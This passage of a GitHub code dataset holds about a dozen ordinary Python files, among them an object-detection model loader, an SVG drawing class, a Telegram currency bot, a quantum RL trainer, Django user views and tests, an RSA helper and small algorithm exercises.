bounce3d/src/model/Coin.py","file_name":"Coin.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"13777971248","text":"import torchvision\nimport torch.nn as nn\nimport torch\nimport numpy as np\nfrom torchvision.models.detection.faster_rcnn import FastRCNNPredictor\nfrom torchvision.models.detection.mask_rcnn import MaskRCNNPredictor\n\ndef getFastRCNNResnet50Fpn(pretrained):\n return torchvision.models.detection.fasterrcnn_resnet50_fpn(pretrained=pretrained)\n\n\ndef getMaskRCNNResnet50Fpn(pretrained):\n return 
torchvision.models.detection.maskrcnn_resnet50_fpn(pretrained=pretrained)\n\n\ndef conv_out_features(model, shape):\n    o = model.cls_score(torch.zeros(1, *shape))\n    return int(np.prod(o.size()))\n\n\ndef ChooseModel(input, n_classes, freeze=False):\n\n    if input == \"faster\":\n        print(f\"model is Faster RCNN resnet 50\")\n        model = getFastRCNNResnet50Fpn(pretrained=True)\n        if freeze:\n            for param in model.parameters():\n                param.requires_grad = False\n        in_features = model.roi_heads.box_predictor.cls_score.in_features\n        model.roi_heads.box_predictor = FastRCNNPredictor(in_features, n_classes)\n\n    elif input == \"mask\":\n        print(f\"model is Mask RCNN\")\n        model = getMaskRCNNResnet50Fpn(pretrained=True)\n        if freeze:\n            for param in model.parameters():\n                param.requires_grad = False\n        in_features = model.roi_heads.box_predictor.cls_score.in_features\n        model.roi_heads.box_predictor = FastRCNNPredictor(in_features, n_classes)\n        in_features_mask = model.roi_heads.mask_predictor.conv5_mask.in_channels\n        hidden_layer = 256\n        model.roi_heads.mask_predictor = MaskRCNNPredictor(in_features_mask,\n                                                           hidden_layer,\n                                                           n_classes)\n    return model\n\n\ndef main():\n    model = ChooseModel(\"mask\", 5, True)\n    print(f\"model is: {model}\")\n    print(\"Pretrained classifiers\")\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"DennisJensen95/solar-panel-inspection","sub_path":"components/neural_nets/NNClassifier.py","file_name":"NNClassifier.py","file_ext":"py","file_size_in_byte":1927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"}
+{"seq_id":"36547793670","text":"from math import pi, cos, sin\n\nclass Canvas2_Draw():\n    def Draw_Text(self,p,text,classs):\n        self.Image_Draw_Text(self.P2Pix(p),text,classs)\n    \n    \n    def Draw_Point(self,p,size,classs,color,parms={}):\n        return self.Image_Draw_Point(self.P2Pix(p),size,classs,color,parms={})\n    \n    def Draw_Segment(self,p1,p2,classs,color=\"\",parms={}):\n        if (not color): color=\"magenta\"\n        return self.Image_Draw_Line(self.P2Pix(p1),self.P2Pix(p2),classs,color,parms)\n    \n    def Draw_Node(self,p,i,size,classs,textclass,color,parms={},textparms={}):\n        color=\"cyan\"\n        return self.Image_Draw_Node(\n            self.P2Pix(p),\n            i,\n            size,\n            classs,\n            textclass,\n            color,\n            parms,\n            textparms\n        )\n\n    #Drawing points as nodes\n    def Draw_Nodes(self,ps,size,classs,textclass,color,parms={},textparms={},every=1):\n\n        svns=[]\n        for i in range( len(ps) ):\n            if ( (i % every)==0):\n                svn=self.Draw_Node(\n                    ps[i],\n                    i,\n                    size,\n                    classs,\n                    textclass,\n                    color,\n                    parms,\n                    textparms\n                )\n\n                svns.append(svn+\"\\n\")\n\n        return svns\n    \n    \n    def Draw_Vector(self,p1,p2,classs,color=\"maroon\",parms={}):\n        px1=self.P2Pix(p1)\n        px2=self.P2Pix(p2)\n\n        svg=\"\\n\".join( self.SVG_Vector(px1,px2,classs,color,parms) )\n        self.SVG.append( svg )\n        return svg\n\n    def Draw_CS(self,O,e,f,classs,color,parms={}):\n        svg=\"\"\n        svg=svg+self.Image_SVG_Comment(\"Drawing CS: \"+classs)\n\n        svg=svg+self.Draw_Point(O,self.Point_Size,classs,color,parms)\n        svg=svg+self.Draw_Vector(O,O+e,classs,color,parms)\n\n        if (f):\n            svg=svg+self.Draw_Vector(O,O+f,classs,color,parms)\n\n        return svg\n    \n    \n    def Draw_Circle(self,pc,r,classs,color=\"\",parms={}):\n        if (not color): color=\"brown\"\n        \n        pcx=self.P2Pix(pc)\n        rx=self.V2Pix([r,r])\n\n        return self.Image_Draw_Circle(pcx,rx,classs,color,parms)\n\n    def Draw_Polyline(self,ps,classs,color,parms={},close=False):\n        \n        pxs=self.Ps2Pix(ps)\n        return self.Image_Draw_Polyline(pxs,classs,color,parms,close)\n\n    \n    def 
Draw_Arc(self,pc,r,ang1,ang2,color,width=1,npoints=100):\n        # collect the arc's polyline points; the loop below already starts at ang1\n        pxs=[]\n        \n        dang=(ang2-ang1)/(1.0*(npoints-1))\n        ang=ang1\n        \n        for i in range(npoints):\n            px=self.P2Pix([ pc[0]+r*cos(ang) , pc[1]+r*sin(ang) ])\n            pxs.append( px )\n\n            ang+=dang\n\n        classs=\"Arc\"\n        return self.Image_Draw_Polyline(pxs,classs,color)\n    \n    #Remove width parameter\n    \n    def Draw_Arc_Span(self,pc,v,ang,classs,color,npoints=100):\n        \n        dang=ang/(1.0*(npoints-1))\n        ang=0.0\n\n        pxs=[]\n        for i in range(npoints):\n            p=pc+v.Rotate2(ang)\n            px=self.P2Pix(p)\n            pxs.append(px)\n            \n            ang+=dang\n        \n        return self.Image_Draw_Polyline(pxs,classs,color)\n    \n    \n    def Draw_Circle_Span(self,pc,v,ang1,ang2,classs,color,npoints=100):\n        \n        dang=(ang2-ang1)/(1.0*(npoints-1))\n        rang=ang1\n\n        pxs=[]\n        for i in range(npoints):\n            p=pc+v.Rotate2(rang)\n            px=self.P2Pix(p)\n            \n            pxs.append(px)\n            rang+=dang\n\n        return self.Image_Draw_Polyline(pxs,classs,color)\n\n    \n    def Draw_Circle_Span_External(self,pc,v,angle,classs,color,npoints=100):\n        angle2=-2.0*pi\n        if (angle>0.0):\n            angle2=2.0*pi\n        \n        return self.Draw_Circle_Span(pc,v,angle,angle2,classs,color,npoints)\n    \n    def Draw_Circle_Span_Internal(self,pc,v,angle,classs,color,npoints=100):\n        return self.Draw_Circle_Span(pc,v,0.0,angle,classs,color,npoints)\n    \n    \n    def Draw_Circle_Spans(self,pc,v,angle,classs,invclasss,color,invcolor,npoints=100):\n        if (angle<0.0):\n            tmp=classs\n            classs=invclasss\n            invclasss=tmp\n            \n            tmp=color\n            color=invcolor\n            invcolor=tmp\n        \n        svg=self.Draw_Circle_Span_External(pc,v,angle,classs,color,npoints)\n        return svg+self.Draw_Circle_Span_Internal(pc,v,angle,invclasss,invcolor,npoints)\n    \n    \n    \n    \n","repo_name":"olesmith/SmtC","sub_path":"Canvas2/Draw.py","file_name":"Draw.py","file_ext":"py","file_size_in_byte":4484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"}
+{"seq_id":"40464396070","text":"import telebot\nfrom config import TOKEN, currency\nfrom extensions import APIException, Convertor\nimport traceback\nbot = telebot.TeleBot(TOKEN)\n\n@bot.message_handler(commands=['start'])\ndef start(message: telebot.types.Message):\n    text = \"Hi there, great to see you 🤗! How is it going?\\n I have a skill that is very useful in these crazy times 😎 \\\n I can calculate the value of foreign currencies! \\\nI will explain how to do that here: /help \\n \\\nTap here to see the list of currencies: /values\"\n\n\n    bot.reply_to(message, text)\n\n@bot.message_handler(commands=['help'])\ndef help(message: telebot.types.Message):\n    text = \"I can convert currencies! Cool, right? To do that you need to enter \\n \\\n<name of the currency whose price you want to know, in the nominative case> \\n\\\n<name of the currency in which to price the first one, also in the nominative case> \\n\\\n<amount of the first currency>\\n \\\nAnd I will tell you what it is worth 😃 \\n \\\nTap here to see the list of currencies: /values\"\n\n    bot.reply_to(message, text)\n\n@bot.message_handler(commands=['values'])\ndef values(message: telebot.types.Message):\n    text = 'We are dealing with:'\n    for key in currency.keys():\n        text = '\\n'.join((text, key, ))\n    bot.reply_to(message, text)\n\n\n@bot.message_handler(content_types=['text'])\ndef converter(message: telebot.types.Message):\n    values = message.text.split()\n    try:\n        if len(values) != 3:\n            raise APIException('Whoa! 
exactly three parameters must be given 🥴 /help')\n\n        answer = Convertor.get_price(*values)\n    except APIException as e:\n        bot.reply_to(message, f\"There is some error in the command 🤔 :\\n{e}\")\n    except Exception as e:\n        traceback.print_tb(e.__traceback__)\n        bot.reply_to(message, f\"And this, my friend, is an unknown error 😳 :\\n{e}\")\n    else:\n        bot.reply_to(message, answer)\n\nbot.polling()\n","repo_name":"Stanley5051/Skillfactory-task-c5.6","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"}
+{"seq_id":"22030794558","text":"import logging\nimport os\nimport sys\nimport time\nfrom functools import reduce\n\nimport numpy as np\nimport tensorflow as tf\nfrom misc.utils import compute_returns, create_exp_dir, gather_episodes\nfrom models.quantum_models import generate_model_policy as Network\nfrom search import quantum_encoding\n\n\ndef main(bit_string, qubits, n_actions, observables, n_episodes = 1000, batch_size = 10, gamma = 1, beta = 1.0,\n         state_bounds = np.array([2.4, 2.5, 0.21, 2.5]), env_name = \"CartPole-v1\", save='quantum', expr_root='search',\n         lr_in = 0.1, lr_var = 0.01, lr_out = 0.1, backend = 'cirq'):\n    \"\"\"\n    Main training process in multi-objective search.\n    \"\"\"\n    save_pth = os.path.join(expr_root, '{}'.format(save))\n    create_exp_dir(save_pth)\n    log_format = '%(asctime)s %(message)s'\n    logging.basicConfig(stream=sys.stdout, level=logging.INFO,\n                        format=log_format, datefmt='%m/%d %I:%M:%S %p')\n    fh = logging.FileHandler(os.path.join(save_pth, 'log.txt'))\n    fh.setFormatter(logging.Formatter(log_format))\n    logging.getLogger().addHandler(fh)\n\n    nb, genotype = quantum_encoding.convert2arch(bit_string)\n    model = Network(qubits, genotype, n_actions, beta, observables, env_name)\n    \n    logging.info(\"Genome = %s\", nb)\n    logging.info(\"Architecture = %s\", genotype)\n\n    optimizer_in = tf.keras.optimizers.Adam(learning_rate=lr_in, amsgrad=True)\n    optimizer_var = tf.keras.optimizers.Adam(learning_rate=lr_var, amsgrad=True)\n    optimizer_out = tf.keras.optimizers.Adam(learning_rate=lr_out, amsgrad=True)\n\n    # Assign the model parameters to each optimizer\n    w_in, w_var, w_out = 1, 0, 2\n\n    @tf.function\n    def reinforce_update(states, actions, returns, model):\n        states = tf.convert_to_tensor(states)\n        actions = tf.convert_to_tensor(actions)\n        returns = tf.convert_to_tensor(returns)\n\n        with tf.GradientTape() as tape:\n            tape.watch(model.trainable_variables)\n            logits = model(states)\n            p_actions = tf.gather_nd(logits, actions)\n            log_probs = tf.math.log(p_actions)\n            loss = tf.math.reduce_sum(-log_probs * returns) / batch_size\n        grads = tape.gradient(loss, model.trainable_variables)\n        for optimizer, w in zip([optimizer_in, optimizer_var, optimizer_out], [w_in, w_var, w_out]):\n            optimizer.apply_gradients([(grads[w], model.trainable_variables[w])])\n\n    # Start training the agent\n    episode_reward_history = []\n    for batch in range(n_episodes // batch_size):\n        # Gather episodes\n        _, episodes = gather_episodes(state_bounds, n_actions, model, batch_size, env_name, beta, backend)\n\n        # Group states, actions and returns in numpy arrays\n        states = np.concatenate([ep['states'] for ep in episodes])\n        actions = np.concatenate([ep['actions'] for ep in episodes])\n        rewards = [ep['rewards'] for ep in episodes]\n        returns = np.concatenate([compute_returns(ep_rwds, gamma) for ep_rwds in rewards])\n        returns = np.array(returns, dtype=np.float32)\n\n        id_action_pairs = 
np.array([[i, a] for i, a in enumerate(actions)])\n\n # Update model parameters.\n reinforce_update(states, id_action_pairs, returns, model)\n\n # Store collected rewards\n for ep_rwds in rewards:\n episode_reward_history.append(np.sum(ep_rwds))\n\n avg_rewards = np.mean(episode_reward_history[-10:])\n\n logging.info('Finished episode: %f', (batch + 1) * batch_size)\n logging.info('Average rewards: %f', avg_rewards)\n \n if avg_rewards >= 500.0 and env_name == \"CartPole-v1\":\n break\n elif avg_rewards >= -110 and env_name == \"MountainCar-v0\":\n break\n return episode_reward_history\n","repo_name":"ScQ-Cloud/pyquafu","sub_path":"examples/quantum_rl/search/quantum_train_search.py","file_name":"quantum_train_search.py","file_ext":"py","file_size_in_byte":3751,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"45"} +{"seq_id":"27304507133","text":"import json\nfrom django.test.testcases import TestCase\nfrom django.test.client import RequestFactory\nfrom django.test.testcases import SimpleTestCase\nfrom fakecouch import FakeCouchDb\n\nfrom corehq.apps.accounting.models import SoftwarePlanEdition\nfrom corehq.apps.accounting.tests.utils import DomainSubscriptionMixin\nfrom corehq.apps.accounting.utils import clear_plan_version_cache\nfrom corehq.apps.users.models import WebUser\n\nfrom corehq.apps.domain.models import Domain\nfrom corehq.apps.userreports.expressions.factory import ExpressionFactory\nfrom corehq.apps.userreports.filters.factory import FilterFactory\nfrom corehq.apps.userreports.models import DataSourceConfiguration\nfrom corehq.apps.userreports.specs import FactoryContext\nfrom corehq.apps.users.models import CommCareUser\nimport os\n\n\nclass ChampTestCase(TestCase, DomainSubscriptionMixin):\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.factory = RequestFactory()\n # gets created + removed in package level setup / teardown\n domain = Domain.get_or_create_with_name('champ-cameroon')\n domain.is_active = True\n domain.save()\n cls.domain = domain\n cls.setup_subscription(cls.domain.name, SoftwarePlanEdition.ADVANCED)\n cls.user = WebUser.create(domain.name, 'test', 'passwordtest', None, None)\n cls.user.is_authenticated = True\n cls.user.is_superuser = True\n cls.user.is_authenticated = True\n cls.user.is_active = True\n\n @classmethod\n def tearDownClass(cls):\n cls.teardown_subscriptions()\n cls.user.delete(cls.domain.name, deleted_by=None)\n clear_plan_version_cache()\n super().tearDownClass()\n\n @classmethod\n def add_request_attrs(cls, request):\n request.user = cls.user\n request.domain = cls.domain.name\n\n\nclass TestDataSourceExpressions(SimpleTestCase):\n\n data_source_name = None\n\n def get_expression(self, column_id, column_type):\n column = self.get_column(column_id)\n if column['type'] == 'boolean':\n return FilterFactory.from_spec(\n column['filter'],\n FactoryContext(self.named_expressions, {})\n )\n else:\n self.assertEqual(column['datatype'], column_type)\n return ExpressionFactory.from_spec(\n column['expression'],\n FactoryContext(self.named_expressions, {})\n )\n\n @classmethod\n def setUpClass(cls):\n super(TestDataSourceExpressions, cls).setUpClass()\n\n data_source_file = os.path.join(\n os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir)),\n 'ucr_data_sources',\n cls.data_source_name\n )\n\n with open(data_source_file, encoding='utf-8') as f:\n cls.data_source = DataSourceConfiguration.wrap(json.loads(f.read())['config'])\n cls.named_expressions = 
cls.data_source.named_expression_objects\n\n def setUp(self):\n self.database = FakeCouchDb()\n self.user_orig_db = CommCareUser.get_db()\n CommCareUser.set_db(self.database)\n\n def tearDown(self):\n CommCareUser.set_db(self.user_orig_db)\n\n def get_column(self, column_id):\n return [\n ind\n for ind in self.data_source.configured_indicators\n if ind['column_id'] == column_id\n ][0]\n","repo_name":"dimagi/commcare-hq","sub_path":"custom/champ/tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3387,"program_lang":"python","lang":"en","doc_type":"code","stars":472,"dataset":"github-code","pt":"45"} +{"seq_id":"42710613325","text":"\"\"\"empty message\n\nRevision ID: 1c6735c6ed2a\nRevises: 028d27d5e5d0\nCreate Date: 2020-07-09 15:16:40.252769\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = \"1c6735c6ed2a\"\ndown_revision = \"028d27d5e5d0\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column(\"users\", sa.Column(\"auto_refresh\", sa.Boolean(), nullable=True))\n op.add_column(\"users\", sa.Column(\"push_enabled\", sa.Boolean(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column(\"users\", \"push_enabled\")\n op.drop_column(\"users\", \"auto_refresh\")\n # ### end Alembic commands ###\n","repo_name":"sendahug/send-hug-backend","sub_path":"migrations/versions/20200709_1516_1c6735c6ed2a_.py","file_name":"20200709_1516_1c6735c6ed2a_.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"29639553558","text":"from cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives.serialization import load_pem_private_key, load_pem_public_key\nfrom cryptography.hazmat.primitives.asymmetric import padding\nfrom cryptography.hazmat.primitives.asymmetric import rsa\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.exceptions import InvalidSignature\n\n\nclass CryptographyHandler:\n def __init__(self, private_key_path: str, public_key_path: str):\n private_key_pem = self._get_pem_from_file(private_key_path)\n public_key_pem = self._get_pem_from_file(public_key_path)\n self._private_key = load_pem_private_key(data=private_key_pem, password=None, backend=default_backend())\n self._public_key = load_pem_public_key(public_key_pem, default_backend())\n\n def _get_pem_from_file(self, path: str) -> bytes:\n with open(path, 'rb') as pem_file:\n return pem_file.read()\n\n def check_signature(self, signature: bytearray, signed_data: bytearray) -> bool:\n try:\n self._public_key.verify(bytes(signature),\n bytes(signed_data),\n padding.PSS(padding.MGF1(hashes.SHA256()), 0), # Padding length?\n hashes.SHA256()\n )\n except InvalidSignature:\n return False\n else:\n return True\n\n def create_signature(self, data_to_sign: bytearray) -> bytearray:\n return self._private_key.sign(bytes(data_to_sign),\n padding.PSS(padding.MGF1(hashes.SHA256()), 0), # Padding length?\n hashes.SHA256()\n )\n\n def encrypt_data(self, data: bytearray) -> bytearray:\n encrypted_data = bytearray()\n while True:\n if len(data) - 150 > 0:\n bytes_data = self._public_key.encrypt(bytes(data[:150]), padding.OAEP(padding.MGF1(hashes.SHA256()), hashes.SHA256(), None))\n encrypted_data.extend(bytes_data)\n data = data[150:]\n 
else:\n bytes_data = self._public_key.encrypt(bytes(data), padding.OAEP(padding.MGF1(hashes.SHA256()), hashes.SHA256(), None))\n encrypted_data.extend(bytes_data)\n break\n return encrypted_data\n\n def decrypt_data(self, data: bytearray) -> bytearray:\n decrypted_data = bytearray()\n while True:\n if len(data) - 256 > 0:\n bytes_data = self._private_key.decrypt(bytes(data[:256]), padding.OAEP(padding.MGF1(hashes.SHA256()), hashes.SHA256(), None))\n decrypted_data.extend(bytes_data)\n data = data[256:]\n else:\n bytes_data = self._private_key.decrypt(bytes(data), padding.OAEP(padding.MGF1(hashes.SHA256()), hashes.SHA256(), None))\n decrypted_data.extend(bytes_data)\n break\n return decrypted_data\n","repo_name":"rafallewanczyk/TIN","sub_path":"temperature_regulator/test/cryptography_handler.py","file_name":"cryptography_handler.py","file_ext":"py","file_size_in_byte":3064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"41247904390","text":"from itertools import permutations \n\nstring = input()\nstring = sorted(string)\nfinal = \"\"\nfor element in string:\n\tfinal += element\ns = set([''.join(p) for p in permutations(final)])\nprint(len(s))\nfor e in s:\n\tprint(e)","repo_name":"shreyas-selvaraj/cses_problems","sub_path":"creating_strings_1.py","file_name":"creating_strings_1.py","file_ext":"py","file_size_in_byte":216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"73774335815","text":"from django.conf import settings\nfrom django.contrib import messages\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.contrib.auth.mixins import LoginRequiredMixin,UserPassesTestMixin,PermissionRequiredMixin\nfrom django.contrib.auth.views import PasswordChangeView, PasswordResetView,LoginView\nfrom django.contrib.auth import login as auth_login\nfrom django.views.generic import CreateView,ListView,DetailView,UpdateView,DeleteView,FormView\nfrom django.shortcuts import redirect\nfrom django.db.models import Q\nfrom django.urls import reverse_lazy\nfrom django.core.files.storage import FileSystemStorage\nfrom itertools import groupby\nfrom operator import attrgetter\n\nfrom .models import *\nfrom .forms import *\n\n\n#region---------------------------------------------------------------------------------------USUARIOS\nfrom django.http import JsonResponse\n\ndef set_dark_mode(request):\n if request.method == 'POST':\n dark_mode = request.POST.get('dark_mode')\n user = request.user\n if user.usuarios.darkmode:\n user.usuarios.darkmode=False\n else:\n user.usuarios.darkmode=True\n user.usuarios.save()\n return JsonResponse({'status': 'ok'})\n \n \nclass UsuariosLoginView(LoginView):\n template_name='login.html'\n\n def form_valid(self, form):\n \"\"\"\n Security check complete. Log the user in.\n Según el rol redirecciona a determinada pagina.\n Por default es Inicio. 
\n \"\"\"\n user=form.get_user()\n auth_login(self.request, user)\n permisos= user.get_all_permissions()\n return redirect('index')\n\n\nclass UsuariosListView(PermissionRequiredMixin, ListView ): \n permission_required = ('auth.view_user') \n model = Usuarios\n\n #Funcion de busqueda\n def get_queryset(self):\n query = self.request.GET.get('busqueda')\n if query:\n object_list = self.model.objects.filter(\n Q(usuario__username__icontains=query) |\n Q(usuario__first_name__icontains=query) |\n Q(usuario__last_name__icontains=query) |\n Q(usuario__email__icontains=query) |\n Q(telefono__icontains=query)\n ).distinct()\n else:\n object_list = self.model.objects.all().exclude(usuario_id__is_superuser =True)\n return object_list\n \n \nclass UsuariosDetailView(UserPassesTestMixin,DetailView):\n model = Usuarios\n template_name = 'Usuarios/usuarios_detail.html'\n\n def test_func(self):\n # accede a la vista de detalle si es admin o si es el mismo usuario\n if self.request.user.is_authenticated:\n usuario_actual = self.request.user.usuarios.id\n usuario_solicitado= int(self.kwargs['pk'])\n if (usuario_actual == usuario_solicitado) or self.request.user.has_perm('auth..base_admin') or self.request.user.has_perm('auth_user.view_user'):\n return True\n else:\n return False \n\n def get_permission_name_traduce(self, codename):\n '''\n Función para traducir los nombres de los permisos\n '''\n if codename.startswith('add_'):\n return f\"Agregar {codename[4:]}\"\n elif codename.startswith('delete_'):\n return f\"Borrar {codename[7:]}\"\n elif codename.startswith('change_'):\n return f\"Modificar {codename[7:]}\"\n elif codename.startswith('view_'):\n return f\"Visualizar {codename[5:]}\"\n else:\n return codename\n \n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n \n usuario = context['object']\n grupos = usuario.usuario.groups.all() \n \n permisos_por_modulo = {}\n for grupo in grupos:\n for permiso in grupo.permissions.all():\n app_label, codename = permiso.content_type.app_label, permiso.codename\n if app_label not in permisos_por_modulo:\n permisos_por_modulo[app_label] = []\n permisos_por_modulo[app_label].append(self.get_permission_name_traduce(codename))\n \n context['permisos_por_modulo'] = permisos_por_modulo\n \n return context\n\n\nclass UsuariosDeleteView(PermissionRequiredMixin,SuccessMessageMixin,DeleteView): \n permission_required = ('auth.delete_user') \n model = Usuarios\n template_name = 'Usuarios/usuarios_confirm_delete.html'\n success_url= reverse_lazy(\"usuarios_listar\")\n success_message = \"El registro fue eliminado correctamente\" \n\n \nclass UsuariosCreateView(PermissionRequiredMixin,SuccessMessageMixin,FormView): \n permission_required = ('auth.add_user') \n template_name = 'Usuarios/usuarios_create_form.html'\n form_class = UsuariosCreateForm \n \n def form_valid(self, form): \n dni = form.cleaned_data['dni'] \n img=self.request.FILES.get('imagen')\n telefono = form.cleaned_data['telefono'] \n if form.is_valid(): \n user=form.save() \n usuario=Usuarios.objects.get(usuario_id=user.id)\n if dni:\n usuario.dni = dni\n if telefono:\n usuario.telefono = telefono\n if img: \n fs = FileSystemStorage()\n filename = fs.save('usuarios/'+img.name, img)\n usuario.imagen= filename \n usuario.save() \n messages.success(self.request, ('Usuario creado con éxito.'))\n return redirect('usuarios_ver',user.usuarios.id)\n else:\n messages.error(self.request, ('No fue posible crear el usuario.'))\n return redirect('usuarios_listar')\n\n\nclass 
UsuariosUpdateView(PermissionRequiredMixin,SuccessMessageMixin,UpdateView):\n permission_required = ('auth.change_user') \n model = User\n form_class = UsuariosUpdateForm \n template_name = 'Usuarios/usuarios_update_form.html'\n\n def form_valid(self, form): \n dni = form.cleaned_data['dni'] \n img=self.request.FILES.get('imagen')\n telefono = form.cleaned_data['telefono'] \n if form.is_valid(): \n user=form.save() \n usuario=Usuarios.objects.get(usuario_id=user.id)\n if dni:\n usuario.dni = dni\n if telefono:\n usuario.telefono = telefono\n if img: \n fs = FileSystemStorage()\n filename = fs.save('usuarios/'+img.name, img)\n usuario.imagen= filename \n usuario.save() \n messages.success(self.request, ('Usuario modificado con éxito.'))\n else:\n messages.error(self.request, ('No fue posible modificar el usuario.'))\n return redirect('usuarios_ver', pk=user.usuarios.id)\n\n#endregion------------------------------------------------------------------------------------------\n\n\n#region---------------------------------------------------------------------------------------PASSWORDS\n\nclass UsuariosResetPassView(PermissionRequiredMixin,SuccessMessageMixin,PasswordResetView):\n '''\n Permite al usuario staff resetear la clave a otros usuarios del sistema mediante el envío de un token por mail. \n IMPORTANTE: el mail al que se envía el token de recupero debe coincidir con el mail que el usuario tiene \n almacenado en su perfil, por lo cual es imprescindible chequear que sea correcto.\n\n De la documentación de Django: \n Given an email, return matching user(s) who should receive a reset.\n This allows subclasses to more easily customize the default policies\n that prevent inactive users and users with unusable passwords from\n resetting their password.\n '''\n permission_required = ('auth.change_user') \n template_name='Passwords/password_reset.html'\n form_class = MyResetPasswordForm\n success_url = reverse_lazy('usuarios_listar')\n success_message = \"Mail de reseteo de contraseña enviado con éxito.\"\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n user_id =self.kwargs['pk']\n user = User.objects.get(id=user_id)\n email=user.email\n context.update(\n {\n \"email\": email, \n \"usuario\": user, \n }\n )\n return context\n\n def get_form_kwargs(self):\n \"\"\"Devuelve los argumentos de palabras (kwargs) clave para instanciar el formulario.\"\"\"\n user_id =self.kwargs['pk']\n user = User.objects.get(id=user_id)\n email=user.email\n kwargs = {\n \"initial\": {'email': email},\n \"prefix\": self.get_prefix(),\n }\n if self.request.method in (\"POST\", \"PUT\"):\n kwargs.update(\n {\n \"data\": self.request.POST,\n \"files\": self.request.FILES,\n }\n )\n return kwargs\n\n#endregion\n\n\n#region---------------------------------------------------------------------------------------PERFILES DE USUARIOS \n\nclass PerfilUpdateView(UserPassesTestMixin,SuccessMessageMixin,UpdateView):\n '''\n Vista para que los usuarios logueados (no staff) realicen cambios en sus datos de perfil.\n De la tabla USER: Nombre de usuario, Nombre, Apellido o email.\n De la tabla USUARIOS(extensión del modelo USER): telefono.\n '''\n model = User\n form_class = PerfilUpdateForm \n template_name = 'Perfiles/perfil_update_form.html'\n success_message = \"Perfil editado con éxito.\" \n\n def test_func(self):\n # accede a la vista si es el mismo usuario\n if self.request.user.is_authenticated:\n usuario_actual = self.request.user.id\n usuario_solicitado= int(self.kwargs['pk'])\n if 
(usuario_actual == usuario_solicitado):\n return True\n else:\n return False \n\n def form_valid(self, form): \n img=self.request.FILES.get('imagen')\n telefono = form.cleaned_data['telefono'] \n dni = form.cleaned_data['dni'] \n if form.is_valid(): \n user=form.save() \n usuario=Usuarios.objects.get(usuario_id=user.id)\n if dni:\n usuario.dni = dni\n if telefono:\n usuario.telefono = telefono\n if img: \n fs = FileSystemStorage()\n filename = fs.save('usuarios/'+img.name, img)\n usuario.imagen= filename \n usuario.save() \n messages.success(self.request, ('Perfil modificado con éxito.'))\n else:\n messages.error(self.request, ('No fue posible modificar el perfil.')) \n return redirect('usuarios_ver', pk=user.usuarios.id)\n \nclass PerfilChangePassView(LoginRequiredMixin,SuccessMessageMixin,PasswordChangeView):\n '''\n Vista para que los usuarios logueados (no staff) realicen cambios de clave. \n Es requisito conocer su clave anterior e introducir una nueva contraseña que cumpla con los requisitos del sistema.\n '''\n template_name='Perfiles/perfil_change_password.html'\n form_class = MyPasswordChangeForm\n success_url = reverse_lazy('index')\n success_message = \"La contraseña fue modificada con éxito.\" \n\n#endregion\n\n","repo_name":"PabloCao1/CRM_ProComuna2","sub_path":"Usuarios/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11383,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"21274379851","text":"\"\"\"\n115. Unique Paths II\nFollow up for \"Unique Paths\":\n\nNow consider if some obstacles are added to the grids. How many unique paths would there be?\n\nAn obstacle and empty space is marked as 1 and 0 respectively in the grid.\n\nExample\nExample 1:\n\tInput: [[0]]\n\tOutput: 1\n\n\nExample 2:\n\tInput: [[0,0,0],[0,1,0],[0,0,0]]\n\tOutput: 2\n\n\tExplanation:\n\tOnly 2 different path.\n\n\nNotice\nm and n will be at most 100.\n\"\"\"\n\n\nclass Solution:\n def uniquePathsWithObstacles(self, obstacleGrid):\n if not obstacleGrid or not obstacleGrid[0] or obstacleGrid[0][0] == 1:\n return 0\n m, n = len(obstacleGrid), len(obstacleGrid[0])\n if obstacleGrid[m - 1][n - 1] == 1:\n return 0\n for i in range(m):\n for j in range(n):\n if obstacleGrid[i][j] == 1:\n obstacleGrid[i][j] = 0\n elif i == 0 and j == 0:\n obstacleGrid[i][j] = 1\n else:\n obstacleGrid[i][j] = (obstacleGrid[i - 1][j] if i - 1 >= 0 else 0) + (obstacleGrid[i][j - 1] if j - 1 >= 0 else 0)\n return obstacleGrid[m - 1][n - 1]\n\n\nprint(Solution().uniquePathsWithObstacles([[0,0],[0,0],[0,0],[1,0],[0,0]]))\n","repo_name":"pansinyoung/python-lint","sub_path":"115_Unique_Paths_II.py","file_name":"115_Unique_Paths_II.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"37271306783","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\ndf = pd.read_csv(\n \"../data/realization_path_gen_logistic_SDE.csv\", sep=',',\n header=1,\n names=[\n \"i\",\n \"t_i\", 